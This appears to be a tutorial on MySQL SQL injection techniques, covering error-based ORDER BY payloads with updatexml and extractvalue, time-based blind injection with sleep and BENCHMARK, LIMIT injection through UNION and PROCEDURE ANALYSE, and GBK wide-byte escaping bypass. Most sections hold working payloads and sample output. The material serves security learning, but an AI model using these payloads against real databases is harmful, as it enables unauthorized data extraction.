order by

order by is a method for sorting query data in mysql. It uses the order by clause to quickly guess the number of columns, and then cooperates with the union select statement for echoing.You can judge by modifying the order parameter to a larger integer and looking at the output.If you don't know the column name, you can refer to the corresponding column by the serial number of the column

select * from users order by x;select * from table name order by column name (or number) asc; ascending order (default ascending order)select * from table name order by column name (or number) desc; descending order

order by injection

1. Get the current database:

select * from users order by id and(updatexml(1,concat(0x7e,(select database()),0x7e),1));

2. Get the version of the database

select * from users order by id and(updatexml(1,concat(0x7e,(select version()),0x7e),1));

3. Get users

select * from users order by id and(updatexml(1,concat(0x7e,(select user()),0x7e),1));

4. Get the number of databases

select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));

5. Get database list information

select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),0));

6. Get the name of the table

select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 0,1),0x7e),0));

Time-Based Blinds

order by if(1=1,1,sleep(1))select * from hehe order by if(1=1,1,sleep(1)); #normal timeselect * from hehe order by if(1=2,1,sleep(1)); #with delayDelay time = the number of seconds in sleep(1) * the number of data queried. If there is a lot of data queried, the delay time will be very long.

order by error injection

Using updatexml

updatexml(1,1,1) can receive a total of three parameters, and the error position is in the second parameterselect * from hehe order by updatexml(1,if(1=1,1,user()),1);#The query is normalselect * from hehe order by updatexml(1,if(1=2,1,user()),1);#Query error

Using extractvalue

extractvalue(1,1) can receive a total of two parameters, and the error position is in the second parameterselect * from hehe order by extractvalue(1,if(1=1,1,user()));#The query is normalselect * from hehe order by extractvalue(1,if(1=2,1,user()));#Query error

limit injection

limit x,y Get y records from the xth of the query result
The common scenario is in the paging function, generally there is the xth page, showing y pieces of data.
The parameter is generally page=x&size=y

No order by

Execute statement select id from users limit 0,1;In this case, you can use union to perform joint query injection after limitExecute the statement select id from users limit 0,1 union select username from users;

There is an order by

This method is suitable for version 5.0.0< MySQL < 5.6.6. The injection
limit keyword after the limit statement can also be followed by two keywords PROCEDURE and INTO, but you need to know when writing files after INTOThe absolute path and the permission to write to the shell are difficult to use, so here we take PROCEDURE as an example to inject, use the PROCEDURE function to inject, ANALYSE supports two parameters, first try the default two parameters

mysql> select id from users order by id desc limit 0,1 procedure analyse(1,1);ERROR 1386 (HY000): Can't use ORDER clause with this procedure

Try to inject one of the parameters and try to inject an error

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'

If there is no echo, use delayed injection. If select version(); the first one is 5, execute sha(1) multiple times to achieve the delayed effect. Sleep is not supported here, so you need to use BENCHMARK instead

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1)))),1);ERROR 1105 (HY000): XPATH syntax error: ':0'

Wide byte injection

Single-byte character set: All characters are represented by one byte, such as ASCII code (0-127)
Multi-byte character set: In a multi-byte character set, some bytes are represented by multipleBytes are represented, and another part (probably not) is represented by a single byte.
Wide byte injection is a feature of mysql. When using GBK encoding, it will consider two characters as one Chinese character

When the size of a character is one byte, the character is called narrow byte.
When the size of a character is two bytes, the character is called wide byte.
All EnglishThe default occupies one byte, and Chinese characters occupy two bytes.
Common wide-byte encodings: GB2312, GBK, GB18030, BIG5, Shift_JIS, etc.
GBK encoding is an extension of GB2312 encoding for storing Chinese characters.GBK encoding adopts double-byte encoding scheme, its encoding range: 8140- FEFE
The generation of wide byte injection is caused by inconsistent character sets, such as: the front end uses UTF-8 encoding, the database uses GBK encoding, when decoding, the database reads the two-bit UTF-8 encoding into one-bit GBK encoding, thereby bypassing the server's escape function and performing SQL injection.